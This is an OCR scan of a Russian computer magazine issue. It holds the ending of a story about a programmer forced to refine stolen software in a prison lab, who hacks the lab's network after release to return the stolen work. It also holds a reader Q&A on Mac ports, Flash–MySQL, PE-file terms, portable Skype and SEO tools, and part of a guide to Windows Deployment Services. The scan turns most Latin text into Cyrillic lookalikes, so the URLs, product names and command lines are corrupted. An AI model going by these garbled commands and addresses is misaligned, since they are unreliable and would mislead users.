ны знать, над чем работают. Но это уже ваши проблемы. Теперь о деньгах. 

В случае успеха вы получите... 

И он назвал столько, что Лукьянову захотелось взять со стола салфетку и 
вытереть слюни. 

— И почему криминал всегда стоит дороже? — то ли разочарованно, то ли 
просто удивленно спросил Сергей. 

Тогда он еще не знал, какую цену ему предстоит заплатить. 

...Понять суть комбинации ему было не под силу. Работал он честно и, 
стоит отметить, очень и очень продуктивно. Те сорок процентов (а главный 
программистоказался чертовски объективен — именно сорок, не больше 
и не меньше) он превратил в восемьдесят. Можетбыть, даже в восемь- 

«СУТЬ «ЗОЛОТОЙ КЛЕТКИ» 

ОН ОСОЗНАЛ СРАЗУ. 

"НЕ МОЖЕШЬ - НАУЧИМ, 
НЕХОЧЕШЬ- ЗАСТАВИМ" 

— ЭТОТ ПРИНЦИП РАБОТАЛ 
ЗДЕСЬ БЕЗОТКАЗНО» 

десятпять. А потом ему дали по ребрам, умудрились вывихнуть плечо и 
посадили на четыре с половиной года. 

Отработать из двух месяцев удалось примерно пять недель. Парни из его 
команды, воодушевленные премиальными, выполняли довольно много 
черновой работы, производя необходимые расчеты, делая наброски ло- 
гических структур (а один из них сам, безо всяких распоряжений, написал 
гениальный обработчикошибок, который могзначительно сократить 
сроки работы). 

Нельзя сказать, что все случилось внезапно. Были какие-то звоночки; 
что-то подсказывало Лукьянову: «Берегись, смотри по сторонам...» И не 
то чтобы он стал чаще оглядываться на улице, по сторонам нет — ходил как 
ни в чем не бывало и дверь открывал, не смотря в глазок. Но где-то внутри 
сидело: «Не свое делаю, чужое...» И совесть, взращенная еще мамой и 
пионерской организацией, ныла, какбольной зуб... 

Пару раз он замечал, что в квартире на привычных местах нет вещей, 
и списывал это на собственную неаккуратность. Иногда в подъезде 
сталкивался с незнакомыми людьми — они опускали глаза, а Сергей 
проходил мимо, особо не задумываясь. Щелчки в телефонной трубке 

— да при нашем качестве связи это обычное дело. 

Потом, на следствии и в тюрьме, Лукьянов сопоставил все факты и при- 
шел к выводу, что пасли его почти с самого начала. Да, он не был Джей- 
мсом Бондом и оказался не готов ктому, что будет установлена слежка. 

Его погубила увлеченность делом —та самая увлеченность талантливых 
людей, которая была выше совести. Сергей писал программу — и не 
заметил, какего вычислили. 

Продолжая играть в шпионов, он поступил так, какбылоусловлено — взял 
все на себя. И воровство исходного текста программы, и его перекомпи- 



ляцию под собственные нужды. Прокурор добавил к этому сопротивление 
при аресте, настоял на том, что суд имеет дело с преступной группой 
(парней-соавторов спасти не удалось — пошли следом, но оба — условно), 

— воттак и вырос его срок. 

Зона встретила его сурово, но справедливо. Виноват? Виноват. 
Значит, отрабатывай свою вину. И уже через две недели его вы- 
звали к начальнику колонии. Там неизвестный товарищ в сером 
костюме объяснил, где Лукьянов оказался и зачем. Суть «золотой 
клетки» он осознал сразу. «Не можешь — научим, не хочешь — за- 
ставим» — этот принцип работал здесь безотказно. Несомненным 
преимуществом было смягчение условий содержания: никакой 
ходьбы строем, никаких хозработ, никакой чистки туалетов. Для 
этого на зоне были простые, не обремененные высшим образова- 
нием, зэки. 

Поместили в некое подобие общежития, только с решетками на окнах. 
Свели стоварищами по несчастью — группой программистов. Показали 
рабочие места — многие институты бы обзавидовалисьтой мощи, что 
оказалась в их распоряжении. 

А потом пришел тот, с кем они пили кофе... 

И пока Лукьянов молчал, не в силах вымолвить ни слова, этотчеловек, 
сломавший его судьбу, протянул ему несколько дисков и сказал: 

— Воттеперьторопиться уже не надо. Сколько тебе сидеть? Четыре с 
половиной? За ближайшие пол года рекомендую довести до ума то, что 
делал на свободе. Потом — следующее задание. 

— Но... зачем? — больше ничего Лукьянов произнести не сумел. 

— С такими талантами нечего делать на свободе, — зло ответил бывший 
начальник. — Твое место здесь. Работай. Покормить тебя не забудут, не 
переживай. 

И Лукьянов работал. Закончил одну работу, вторую, третью... Он 
понимал, что ему подкидываютукраденные программы, ворованные 
исходники, чужие мысли. Понимал, но ничего не мог с этим поделать. 
Брал, изучал, улучшал, дорабатывал... «Золотая клетка» работала 
слаженно. Не хочешь работать — карцер. Не уложился в срок — карцер. 
Пару раз крепко били. Но все наказания он понес в первый год — потом 
понял, что не стоитдразнить начальство и саботировать процесс. И 
работал оставшиеся годы, как машина, чтобы выйти «на свободу с 
чистой совестью». 

Его стремились оставить в «клетке», сначала уговорами, потом провока- 
циями. Он сумел устоять, удержаться от соблазнов. Он хотел выйти, потому 
что судьба графа Монте-Кристо еще никого не оставляла равнодушной... 
На лестничной клетке он сумел подключиться ктелефонной линии 
соседей. Потом разломал в одном месте стенку кладовки и вытащил 
оттуда ноутбук, который тщательным образом спрятал за неделю до 
ареста, когда вдруг понял, что люди с пронзительным металличес- 
ким взглядом не просто так ходят под его дверями. Аккумуляторы, 
конечно, уже были ни к черту, но электричество в его квартире пока не 
обрезали. 

Шепча под нос свои числовые заклинания, он вышел в интернет. 

Пройдя по оставленным им самим коридорам, оказался в сети 
«золотой клетки». Данные с компьютеров потекли к нему на 
винчестер. Еще через час он отправил все эти ворованные 
творения их настоящим создателям сточным указанием адреса, 
откуда они были взяты. Проделав все это, Лукьянов собрал свои 
нехилые пожитки и ушел через крышу, оставив наблюдателей ни с чем. 

— На свободу — с чистой совестью, — сказал он, зная, что не останется 
без вознаграждения. Во всем мирето, что он только что сделал, всегда 
хорошо оплачивалось. ..□с 
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СТЕПАН «8ТЕР» ИЛЬИН 

/ РАОбВЕАЬ. ХАКЕР. ВЫ / 



ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ, 
ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯКОМ/ФРИКОМ, ДЛЯ ЭТОГО 
ЕСТЬ НАСК-РАО (НАСКРАО@ВЕАІ_. ХАКЕР. ВЫ); НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА КОТОРЫЕ ТЫ 
ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, 
ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. I | [ 

"III [ 1 Г“* 1 I Г 



О: Вот уж не думал, что когда-нибудь 
доведется поработать с Мас’ом. 

Ан нет, в университет привезли аж 
несколько штук. Теперь вот озада- 
чен: то ли серфить инет в поисках 
варезного софта, то ли попробовать 
установить что-нибудь более родное, 
привычное. Ведь можно же как-ни- 
будь запустить виндовые или хотя 
бы никсовые приложения под Мае 
05 X? 

А: По всем видимости.тем же самым вопросом 
озадачилось и еще несколько людей, усилиями 
которых был воплощен в жизнь проект Ріпк 
( \лллл/у.бпкрго[есбога ). Толковые разработчи- 
ки взяли да и модифицировали известные 
программы для никсовтаким образом, чтобы те 
могли компилироваться и работать в Мае 05 X. 

А потом запихнули их в удобную оболочку, чтобы 



пользователю не нужно было ломать голову 
над, компиляцией приложений. Всю грязную 
работу берет на себя автоматический сборщик, 
испрльзующий бркд и арі-деі: для эффективного 
управления бинарными пакетами. Закачать Ріпк 
ты можешь с официального сайта, но перед инс- 
талляцией проверь, установлен ли в системеХ1 1 . 
Вообще, Ріпк — это всего лишь опрятное окошко 
с огромным списком программ, любую из которых 
ты можешь установить, кликнув в меню «Віпагу 
-> ІпзІаІЬ.Тулза сама определит все зависи- 
мости и установит дополнительные библиотеки 
в случае необходимости. Теперьтебе остается 
только открыть терминал и набрать в консоли имя 
программы. И черт подери, оно действительно 
работает! Подробный мануал с картинками ты 
найдешь на сайте ѵѵѵѵѵѵ.5Ітр[еЬе[р.пеІ . 

С приложениями ѴѴіпсІоѵѵз дела обстоят намного 
хуже. Тут варианта два: либо использовать 



виртуальную машину (ѵѵѵѵѵѵ.арріе.сот/тасозх/ 
аррІісабопз/ѵігШаІрс І. либо же — хитрую связку 
2Х АррІісабопЗегѵег [ \лл/ѵѵѵ.2х.сот ]. состоящую из 
сервера приложений (запущенного на ѴѴіпсІоѵѵз) и 
специального клиента (на Мае 05Х). 

О: Каким образом в приложении, 
написанном на ГІазІі, можно реализо- 
вать поддержку Му801.-базы дан- 
ных? Нужно импортировать из базы 
некоторые данные. 

А: Чтобы реализовать импорт данных из Му50І_- 
базы данных обычными средствами Паэб, 
потребовалась бы масса усилий. Однахо сейчас 
уже есть готовые драйверы-насадки на Асбоп 
5сгірб которые почти полностью выполняют ра- 
боту за тебя. Я имел дело с аз501_ ( Ы:{р://тас[ета. 
сот/азздб .'но это не единственный вариант. 
Проблемы в реализации подобной штуковины 



НАСКРАОгаКЕАІ-.ХАКЕР.Ки 



/ 126 



ХАКЕР 06 /102/ 07 






ипПз 




два. Поскольку РІазЬ-приложрние выполняется 
на стороне клиента, то и запросы к базе данных 
будут поступать извне. Это значит, что сервер уже 
нельзя будет сделать исключительно локаль- 
ным и спрятать за файрволом^его пр.идется 
оставить открытым со всеми вытекающими 
последствиями. Второй вопрос заключается в 
том, где хранить адрес сервера, логины и пароли 
для доступа к БД? Хранить их в открытом виде в 
зѵѵГ-файле — сумасшествие, поскольку его легко 
можно декомпилировать. К счастью, автор решил 
эту проблему с помощью механизма 
скремблирования. 

О: Объясните, пожалуйста, на паль- 
цах смысл следующих понятий: 
динамическая библиотека, РЕ-файл, 
оверлей, таблица импорта, точка 
входа, ВѴА-адрес. Они встречают- 
ся у вас чуть ли не в каждой второй 
статье, но смысл их по-прежнему 
остается для меня загадкой. 

А: РЕ — это, вообще, сокращение от РогГаЫе 
ЕхесиГаЫе, то есть РЕ-файл является портиру- 
емым и исполняемым. Тот, который запускается 
и исполняется, а это все ехе- и сІИ-файлы в 32- и 
64-битных редакциях ѴѴіпсІоѵѵз. 

Динамическая библиотека — это тоже РЕ-файл, 
экспортирующий (то есть предоставляющий для 
наружного использования) функции, глобальные 
переменные и/или ресурсы (такие как, например, 
пиктограммы). Динамическая библиотека может 
быть загружена (и использована) программой 
сразу при рта рте или по мере необходимости (на- 
пример, функции печати могут быть помещены в 
динамическую библиотеку, загружаемую тодько 
при печати документа и затем выгружаемую из 
памяти). 

Оверлей применительно к РЕ-файлу — это та 
часть файла, которая находится на диске (не 
проецируется в память системным загрузчиком), 
но может считываться самой программой через 
обычные функции файлового ввода-вывода. 
Обычно в оверлей помещают отладочную и-нфор- 
мацию, различные сертификаты и т.д. 

Таблица импорта — специальная структура 
РЕ-файла; указывающая систем ному загруз- 
чику, какие динамические библиотеки должны 
быть загружены при старте программы и какие 
функции/фобал&ные переменные/ресурсы 

подключены. 

I ! - 1 



Точка входа — это смещение отначада испол- 
няемого файла, с которого начинается его 
выполнение. 

РѴА-адрес — это относительный виртуальный 
адрес (ВеІаГіѵеѴігГиаІАсІсІгезз). Виртуальным 
адресом (ѴігТиаІ Асісігезз) называется один из 
адресов внутри адресного пространства, выде- 
ленного системой процессу. Базовым адресом 
(Вазе Асісігезз) называется адрес, по которому 
ехе-файл или динамическая библиотека загру- 
жены в виртуальное адресное пространство. 
Соответственно, относительным виртуальным 
адресом называется разница между виртуаль- 
ным и базовым адресами. 

О: Подскажи, где найти рогіаЫе-вер- 
сию §куре, чтобы всегда носить с 
собой на 11§В-флешке? 

А: Можно долго ругать разработчиков Бкуре за 
то, что программа генеритогромное количество 
трафика и что на сервер отправляется инфор- 
мация о железе, установленном на компьютере. 
Но зато первые версии Бкуре можно было легко 
портировать с помощью специальных ключей, 
изначально заложенных в программу. Порядок 
действий такой: 

1. Качаем старую версию Бкуре 1 .4 (ищем в Гугле). 

2. Устанавливаем ее и копируем папку с програм- 
мой на флешку. 

3. В папке создаем новую директорию — сіаіа, в 
которой будут храниться всевозможные данные. 

4. И далее запускаем Бкуре следующим образом: 

зкуре.ехе /сІаСараЫі: "БаСа" 
/гешоѵаЫе 

С новыми версиямитакой фокус уже не пройдет, 
хотя на рогГаЫеаррз.сот иногда попадаются 
полуработающие варианты. А вообще, подумай, 
оно тебе надо? Ведь можно не париться со • 
Бкуре и смело использовать онлайн-сервис 
ѵѵѵѵѵѵ.іаіаб.сот . Это настоящий убийца Бкуре, 
который работает на ура, требуеттолько браузер 
и предлагает выгодные тарифы звонков на— 
обычные телефоны. 

О: В последнее время всерьез взялся 
за раскрутку и оптимизацию сайтов 
(ЗеагсН Епдіпе Оріітіхаііоп, 8ЕО). 
Сейчас легко поднимаю $300 в 
месяц, но хочется большего. Опыта 




пока мало, поэтому прошу подска- 
зать, какие инструменты могут быть 
полезными в моей работе? 

А: Поделюсь некоторыми мыслями. Многие 
поисковые серверы сейчас поддерживаюттак 
называемые карты сайтов (зіГетар). Это не- 
большой файлик; в котором владелец ресурса 
указывает основные разделы сайта и ссылки 
на них. Во время кэширования поисковый 
робот скачивает его и далее использует во 
время выдачи результатов поиска. Выгода 
на лицо. Во-первых, вместо одной ссылки на 
твой сайт, в результатах будут отображаться 
несколько, и пользователь сможет сразу 
перейти к нужному разделу. А во-вторых, 
грамотно составленный зіГетар серьезно ук- 
репляет позиции твоего ресурса и поднимает 
его в результатах поиска. Составить зіГетар 

— дело на І 5-20 минут, 'особенно если под 
рукой есть такой полезный инструмент, как 
ммщ.хгпІ-зіГегпарз.сот . 

Двигаемся дальше. Самый верный способ 
поднять позицию своего сайта в результатах 
поиска — оптимизировать его именно под те 
ключевые слова, по которым пользователи 
будут искать твой ресурс. Например, юзеры 
используют в качестве ключевого слова 
«автомобиль» намного чаще, чем «машина». 
Статистика запросов доступна в открытом виде 
на сайтах самих поисковых систем (у Яндекса 
это ѵѵогсІзГаГ.ѵапсІех.ги ). но просматривать ее 
придется вручную. Гораздо удобнее это делать 
с помощью специального плагина для ЕігеГох 

— ТГіе 5Е0 }ог ЕігеГох ЕхГепзіоп ( ЬГГрУ/ГооГз. 
зеоЬоок.сот/ГігеГох/зео-Гог-ГігеГох.ЬГтІ ). Тем 
более что в его арсенале еще куча полезных 
инструментов. 

Не надо объяснять, как важно владеть инфор- 
мацией. Вотлишь несколько вопросов, которые 
должен задаватьсебе грамотный БЕО'шник. 
Какие поисковые слова задействовали пользо- 
ватели при-переходе на твой сайт? С каких ре- 
сурсов осуществлялся переход? Какие разделы 
чаще всего посещают? Ответы на эти вопросы 
могут дать многие вспомогательные инстру- 
менты. Особую популярность снискал сервис 
Ѳоодіе АпаІуГісз ( ѵѵѵѵѵѵ.аооаІе.сот/апаІѵГісз ). 
который на днях претерпел серьезный апгрейд. 
Однако некоторые профи отдают предпочтение 
НіГТаіІ ( уѵ\л/\л/.біГГаГ[.сот ). выдающему результа- 
ты в реальном времени. 2-И 
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Ставим ѴѴшбоѵѵз 

по СЕТИ 

Ѵ\Ш5 : служба удаленной установки ѴѴіпсІоѵѵз 

Союз ТЕТИ Аси и дяди 

ДЖАББЕРА 

Создай свой сервер мгновенного обмена сообщениями на базе Е^аЬЪе^сі 
и ІЗегѵегсІ 

Хакерские приемы 

НА СЛУЖБЕ У АДМИНА 

Накладывание обновлений на серверы ѴѴіпйо'ѵѵз и *піх без перезагрузки 

Бесшумный сервер 

своими РУКАМИ 

Решаем проблему снижения шума на домашнем сервере 

+ 

2 ВИДЕОУРОКА 
ДЛЯ АДМИНОВ 



>> ХАКЕРРКО 




Ставим 
ѴѴіыбоѵѵз 

по СЕТИ 



\ЛШ5: СЛУЖБА УДАЛЕННОЙ УСТАНОВКИ ѴѴІЫ00ѴѴ5 



Установка операционной системы — дело весьма скучное и отнимающее, как правило, кучу времени. 

И это без учета того, что, кроме системы, понадобятся еще патчи и различные приложения. Если компью- 
теров несколько, эта процедура еще может быть терпимой, но если количество рабочих станций исчис- 
ляется десятками/сотнями, без автоматизации процесса не обойтись. Служба УУтйошз ѴѴБ5 (ѴѴіпсіоѵѵз 
Беріоутепі: Зегѵісез) позволяет упростить решение проблемы развертывания системы в масштабах пред- 
приятия посредством установки системы из заранее подготовленного образа через сеть. 



Назначение и возможности Ѵ\Ш5 

Служба Ѵ\ЮЗ — это не первая реализация 
сервиса, позволяющего установить систему по 
сети. Служба удаленной установки появи- 
лась еще в ѴѴіпсІоѵѵз 2000 Зегѵег — Кетоне 
ІпзНаІІаНіоп Зегѵісез, КІЗ. Несмотря на различия 
в названиях, задачи КІЗ и Ѵ\Ю5 схожи — быст- 
рое внедрение и развертывание ѴѴіпсІоѵѵз на 
новых компьютерах с использованием 
установки по сети. При этом отпадает 



необходимость физического присутствия на 
каждом компьютере и использования устано- 
вочного компакт-диска. 

Служба ѴѴОЗ является обновленной и перерабо- 
танной версией КІЗ. Главные ее отличия — под- 
держка ѴѴІпсІоѵѵз ѴізПа и нового формата файлов 
ѴѴіпсІоѵѵз Іта§іп§ — ѴѴІМ, обеспечивающего 
хорошее сжатие (примерно в 2 раза). Также 
в Ѵ\ЮЗ встроена поддержка среды предвари- 
тельной установки ѴѴіпсІоѵѵз (ѴѴіпс1о\ѵ5 РЕ в 



качестве загрузочной операционной системы) . 
Обрати внимание, что КІЗ не будет работать 
с Ѵізіа, поэтому, если планируется установка 
этой версии операционной системы, пере- 
ход на ѴѴЕ)5 неизбежен. Учитывая, что ѴШ5 
полностью поддерживает образы, созданные 
с помощью КІ5, это обновление не повлечет за 
собой проблем. 

Сегодня существуют продукты вроде ІЧогТоп 
или Асгопіз ТгиеІта§е, позволяющие создавать 
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образ системы и затем по мере необходимости 
копировать его на остальные компьютеры. 
Сервис Ш3/ѴѴЕ)5 входит в состав операционной 
системы и бесплатен, а за каждого клиента в 
Сііозі: и ТшеІта§е необходимо платить. Кроме 
того, образы, созданные для ѴѴЕ)3, можно мо- 
дернизировать, добавляя сервис-паки, обнов- 
ления и драйверы. В случае с образом, создан- 
ным в СЬой, сначала необходимо установить 
систему на другой компьютер и создать образ. 

В Ѵ\Ю5 это также можно сделать, но только для 
создания мастер-образа, который затем будет 
использован для установки системы. 

Система, построенная на ѴѴБЗ, имеет три сер- 
верных режима работы: 

1 . Ье§асу шобе (Ш5) — устаревшая служба КІ5, 
использующая мастер установки клиентов 
ОЗСЬоозег и типы образов ІИЗЕТИР и КІРКЕР; 

2. Иагіѵе шобе (ѴѴЛЗ) — основной режим рабо- 
ты ѴѴБЗ, среда загрузки ѴѴіпбо\ѵз РЕ и образы 
ММ; 

3. Міхеб шобе — смешанный режим работы 
ѴѴЕ)5, в который служба переходит после 
обновления установленной службы КІЗ; в этом 
варианте доступны все среды загрузки и подде- 
рживаются образы, присущие обоим режимам. 
Последний вариант удобен на переходном 
этапе, когда уже имеются созданные ранее 
загрузочные образы для Ш5 и необходимы 
новые возможности, заложенные в ѴѴЕ)8. После 
преобразования устаревших типов образов 

в ѴѴІМ-формат можно отключить ОЗСЬоозег 
(с помощью команды ѴѴПЗЦТІЬ /зеі-зегѵег / 
іогсепагіѵе) и тем самым перейти в Магіѵе шобе. 

Установка Ѵ\Ш5 

Сервис ѴѴЕ)5 в ѴѴіпбоѵѵз 2003 Зегѵег 5Р2 и Ѵізіа 
Зегѵег ѴѴБЗ включен по умолчанию. Для 5Р1 
он поставляется в виде обновления, которое 
доступно в пакете автоматической установки 
ѴѴіпбоѵѵз (ѴѴіпбоѵѵз АіПотаіеб ІпзГаІІаТіоп КІИ, 
или ѴѴАІК) . В статье мы рассмотрим имен- 
но последний вариант, так как он требует 
совершения несколько большего количества 
шагов. Кстати, сам ѴѴАІК — весьма полезный 



инструмент для создания и редактирования 
ѴѴІМ-образов. Итак, для развертывания ѴѴБ5 
необходимо выполнить несколько условий: 

1 . Сервер ѴѴОЗ должен быть членом или конт- 
роллером домена Асгіѵе Пігесіогу. 

2. Поскольку ѴѴЕ)3 использует среду уда- 
ленной загрузки (РХЕ — Рге-Ъооі Ехесигіоп 
Епѵігоптепі:), в сети должен быть доступен 
работающий сервер ОНСР с активным диапазо- 
ном и ЭИЗ-сервер. 

3. Для хранилища образов на сервере понадо- 
бится отдельный (лучше не системный) раздел, 
отформатированный под файловую систему 
ГѵГГРЗ. 

Перед обновлением Ш5 до ѴѴЕ)3, вполне 
естественно, ШЗ должен быть уже установлен 
(иначе следует зайти в «Панель Управления^ 
Установка и удаление программѣ Установка 
компонентов ѴѴіпбоѵѵз» и выбрать в списке 
«Службы удаленной установки») . Далее скачи- 
ваем с сайта МісгозоЛ пакет ѴѴАІК Г^о.тісгозоіі:. 
сот/Міпк/?ЬіпкІб= 81030) . Обрати внима- 
ние, что есть варианты для разных языков. В 
зависимости от языка размер образов варьиру- 
ется от 750 до 992 Мб. Записываем ІМС-образ 
на БУЕ). После его запуска появится меню, в 
котором выбираем пункт «Службы разверты- 
вания ѴѴіпбоѵѵз». В открывшемся каталоге, 
кроме двух вордовских документов, находятся 
два исполняемых файла. Один для х86-плат- 
форм, второй для А1ѴГО64. Запускаем нужный и 
следуем указаниям мастера установки. После 
установки потребуется перезагрузка. 

Настройка службы 

После установки во вкладке «Администрирова- 
ние» появятся два новых пункта: «Службы раз- 
вертывания ѴѴіпбоѵѵз» (ѴѴіпбоѵѵз Оеріоутепі: 
Зегѵісез) и «Устаревшие службы развертыва- 
ния ѴѴіпбоѵѵз» (ѴѴіпбоѵѵз Періоушепі: Зегѵісез 
Ье^асу) . Последний заменит пункт «Служба 
удаленной установки» (Кетоіе ІпзИаІІагіоп 
Зегѵісе ЗеШр) и может быть использован для 
работы с уже имеющимися компонентами КІЗ. 
Схема работы с этим пунктом идентична работе 



с КІ5, поэтому трогать его не будем. 

Управление и настройки службы ѴѴБЗ про- 
изводятся через консоль управления ѴѴЕ)5, 
которая является оснасткой ММС (МісгозоЛ 
Мапа^етепі Сопзоіе) . Для ее вызова выбираем 
пункт «Службы развертывания ѴѴіпбоѵѵз». Те- 
перь раскрываем список и указываем нужный 
сервер ѴѴБЗ (в сети их может быть несколько) . 
Сервер поначалу не настроен, поэтому вы- 
зываем контекстное меню и выбираем пункт 
«Настроить сервер». Появится окно мастера 
настройки служб развертывания ѴѴіпбоѵѵз. На 
первом этапе указываем каталог, в котором 
будут храниться образы операционных систем 
для развертывания с этого сервера. По умол- 
чанию предлагается каталог С: ЧКетоііеІпзіаІІ. 
Если ранее была настроена служба ИЗ, мастер 
покажет на каталог, используемый этой 
службой; изменить его на другой в этом случае 
будет невозможно. Образы могут занимать 
много места, плюс некоторое пространство 
потребуется при пересборке образов. Поэтому 
в разделе должно быть достаточно свободного 
пространства. На следующем шаге выбирается 
политика ответа сервера известным или неиз- 
вестным клиентам АсгіѵеПігесІогу. Здесь можно 
указать один из трех вариантов: 

1 . «Не отвечать клиентским компьютерам»; 

2. «Отвечать только известным клиентским 
компьютерам»; 

3. «Отвечать всем (известным и неизвестным) 
клиентским компьютерам». 

Удобнее всего выбрать последний пункт, до- 
полнительно установив флажок «Если клиент 
неизвестен, уведомлять администратора и 
отвечать после утверждения». В этом случае 
доступ к серверу будет получен только после 
подтверждения полномочий пользователя 
администратором. Если сервер ѴѴЛЗ один и 
сеть достаточно контролируема, то это самый 
подходящий вариант. Иначе перед подключе- 
нием нового клиентского компьютера следует 
завести для него или для пользователя учетную 
запись. После нажатия на «Готово» будет произ- 
ведена настройка и запуск службы. 
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В окне выбранного сервера появится несколько 
папок. Теперь снова выбираем контекстное 
меню сервера и в нем — пункт «Свойства». 

В окне свойств сервера несколько вкладок. 

Во вкладке «Общие» показаны основные 
настройки и режим сервера. В «Параметры 
РХЕ-ответа» можно отредактировать политику 
ответа клиентам. Вкладка «Службы каталогов» 
отвечает за именование новых клиентских 
компьютеров и размещение их в доменных 
службах Асгіѵе Оігесіогу. По умолчанию новые 
компьютеры предлагается размещать в том же 
домене, что и у сервера службы ѴѴБ5 . При необ- 
ходимости можно привязать к пользователю 
или к подразделению, к которому принадлежит 
пользователь, запустивший клиента удаленно- 
го развертывания, или выбрать домен вручную. 
Во вкладке «Загрузка» для разных архитектур 
указаны программы и образы загрузки по умол- 
чанию. В комплекте ѴѴБ5 уже имеются готовые 
программы, поэтому в этом поле можно ничего 
не трогать. Образ для загрузки по умолчанию 
надо будет указать только после добавления в 
основном окне программы образов для уста- 
новки и загрузки операционных систем. 
Вкладка «Клиент» позволяет настроить запуск 
в автоматическом режиме. Для этого заранее 
создается файл автоматической установки, ко- 
торый и указывается в этой вкладке. Если после 
установки операционной системы не требуется 
создавать новую учетную запись в домене, сле- 
дует установить флажок «Не создавать учетную 
запись в домене после запуска клиента». 
Вкладка «Протокол БНСР» содержит два очень 
важных параметра. Так, если служба ЭНСР 
находится на том же сервере, что и служба Ѵ\Ю$, 
необходимо установить флажок «Не прослуши- 
вать порт 67» и сделать тэг 60 ЭНСР-параметра 
равным РХЕСНепИ, поставив флажок напротив 
этого пункта. В противном случае следует снять 



эти два флажка, а на ОНСР-сервере вручную 
задать параметр РХЕСІіепі:. 

И, наконец, последняя вкладка «Дополнитель- 
но». Здесь задаются допустимые контроллеры 
домена и БНСР-авторизация. В самом простом 
случае можно разрешить обнаруживать 
службы Асгіѵе Оігесіюгу динамически. Если 
ОНСР-сервер находится на другом компьютере, 
обязательно следует включить «Да, я хочу авто- 
ризовать сервер служб развертывания ѴѴіпбочлге 
в ОНСР». По окончании настроек не забудь 
нажать «Применить», чтобы активировать все 
установки. 

Добавление образов установки и загрузки 

Теперь самое главное, ради чего все это было 
затеяно, — добавление образов в сервис Ѵ\Ю5. 
Выбираем «Образы установок» и в контекстном 
меню нажимаем «Добавить образ установки». 
Запустится мастер добавления образов. Если 
ранее не было создано групп образов (это 
можно сделать из того же контекстного меню), 
в первом окне будет выдан запрос на создание 
такой группы. Если требуется использовать 
ранее созданную группу, выбираем ее в рас- 
крывающемся списке. Переходим в следующее 
окно, в котором следует указать \ѴІМ-файл, 
содержащий нужный образ. В ѴѴіпбот ѴізГа 
такой файл называется ішЩІІ.ѵѵіт и находится 
в каталоге зоигсез установочного диска. Файл 
формата ѴѴІМ может содержать несколько обра- 
зов, которые легко изменять, используя ХМЬ. 

На следующем шаге выбираем образы, которые 
следует добавить. Сняв флажок внизу, можно 
изменить описание образа. После сводки будет 
произведена проверка целостности исходных 
образов установки и их копирование в локаль- 
ный каталог. 

Теперь необходимо добавить загрузочный 
образ, который будут использовать клиенты 



при подключении. Проделывается это анало- 
гичным способом. Выбираем каталог «Образы 
загрузки», затем в меню — пункт «Добавить 
образ загрузки». В мастере указываем файл 
ЪооГ.ѵѵіт, который находится в том же катало- 
ге, что и іпзііаіі.ѵѵіт. После этой процедуры поя- 
вится окно, в котором можно отредактировать 
образ и его описание. Аналогично добавляются 
и другие образы под каждую архитектуру. Если 
используется образ собственноручного изго- 
товления, следует помнить, что имя ѴѴІМ-файла 
должно состоять только из букв латинского 
алфавита и цифр. Кроме того, в нем не должно 
быть пробелов, иначе при загрузке клиентов 
могут возникнуть проблемы. Из-за ограниче- 
ний меню загрузки не может отображать более 
13 образов, поэтому увлекаться тоже особенно 
не стоит. Теперь следует вернуться во вкладку 
«Свойства», упомянутую выше, и установить 
образ, который при загрузке будет предлагать- 
ся клиентам по умолчанию. 

Создание образов 

С помощью оснастки Ѵ\ЛЭ5 можно создавать 
образы нескольких типов: 

1 . Образы записи (СарШге іта§ез) — модифи- 
цированный загрузочный образ ѴѴіпбоѵѵз РЕ 2.0, 
который используется для удаленной загрузки, 
захвата и создания образов установки с эта- 
лонных систем, подготовленных с помощью 
программы Зузргер.ехе. 

2. Образы обнаружения фізсоѵег іша^ез) 

— с помощью этого образа можно загружать 
клиентскую систему, не поддерживающую 
РХЕ; после загрузки с такого диска запускается 
мастер обнаружения службы ѴѴБЗ. 

3. Образы установки (ІпзИаІІ іта^ез) — образы 
операционных систем, которые используются 
для установки на клиентские компьютеры. 
Разберемся, как создать образ обнаружения. 



/ 132 



ХАКЕР 06 /102/ 07 





>> ХАКЕР.РКО 



Переходим во вкладку «Образы загрузки», 
выбираем образ, который будет использован 
для создания образа обнаружения. При выборе 
следует учитывать архитектуру компьютеров, 
хотя образ, созданный для х86, будет работать 
везде. В контекстном меню выбираем «Создать 
образ загрузки обнаружения». Появится очеред- 
ной мастер, в котором следует указать имя, опи- 
сание, месторасположение и имя файла нового 
образа (с расширением ч/ѵіт), а также сервер 
развертывания, который будет отвечать клиен- 
ту, использующему для загрузки этот образ. В 
результате работы мастера будет создан новый 
ѴѴІМ-файл. Далее его необходимо преобразо- 
вать в 150-образ и записать на компакт-диск. 
Для преобразования в 150 понадобится пакет 
ѴѴіпбо\ѵ5 АІК, который доступен на том же дис- 
ке, что и обновление \ѴЕ)5 (кроме того, не за- 
будь установить МісгозоВ: .ЫЕТ Ргатеѵѵогк 2.0 и 
М5ХМЬ 6.0) . Затем выбираем пункт «Установ- 
ка ѴѴіпбоѵѵз АІК» и следуем указаниям мастера. 
После установки в меню «Пуск -> Программы» 
появится одноименный пункт. Сейчас нам в 
нем интересен подпункт «Утилиты командной 
строки ѴѴіпсіоѵѵз РЕ». При его выборе появля- 
ется командная строка, аналогичная запуску 
стб, только дополнительно будут загружены 
все необходимые переменные окружения, и не 
надо будет вводить полный путь к некоторым 
файлам. В русскоязычном руководстве пред- 
лагается использовать стандартные средства 
копирования вроде сору, однако при их исполь- 
зовании загрузочный диск получить невоз- 
можно. Создаем среду построения ѴѴіпРЕ: 

> сору РЕ х86 <1: \Ѵ7іпре 

Для 64-битной архитектуры вместо х86 выби- 
раем атс164. Далее копируем созданный образ 
загрузки: 

> сору /у с : \ЬооЬ .Ш-Ш сі: \Міпре\ 

ІЗО\Зоигсез 

И создаем загрузочный 150-образ с помощью 
озс(1іт§: 

> озссіітд -п -Ьсі: \міпре\І50\Ъоо*:\ 

еЫзЪооЬ . сот сі: \тпре (3:\тпре. 

ізо 

Теперь записываем созданный образ на носи- 
